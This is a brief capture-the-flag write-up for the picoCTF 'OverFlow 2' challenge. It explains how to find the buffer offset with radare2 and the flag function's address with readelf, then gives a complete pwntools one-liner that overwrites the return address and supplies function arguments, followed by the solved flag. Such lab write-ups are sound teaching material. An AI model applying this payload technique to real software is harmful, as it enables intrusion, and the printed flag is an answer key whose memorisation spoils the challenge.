Comment on page
OverFlow 2
Now try overwriting arguments. Can you get the flag from this program? You can find it in /problems/overflow-2_2_47d6bbdfb1ccd0d65a76e6cbe0935b0f on the shell server. Source.
- 1.Find the offset/padding
- 1.You can use the method described in rop64 with the
cyclic
andcyclic_find
or you can use the following - 2.
- 3.Run
aaaa
- 4.Run
pdf @ sym.vuln
to getvar int local_b8h @ ebp-0xb8
- 5.The
0xb8
is the buffer location so 4 more bytes are needed to get past the "saved ebp register" - 6.So the offset is
0xb8+4
- 2.Run
readelf -s vuln
to get the address offlag
:0x080485e6
- 3.We can use
p32
from pwntools to convert the hex addresses to little endian. - 4.We need to pad out the second return address with
'a'*4
so that goes next in the payload - 5.Now we can add the two function arguments in little endian using
p32
- 6.Payload complete:
python2 -c "from pwn import *; print 'a'*(0xb8+4)+p32(0x080485e6)+'a'*4+p32(0xDEADBEEF)+p32(0xC0DED00D)" | ./vuln
picoCTF{arg5_and_r3turn5ce5cf61a}
Last modified 2yr ago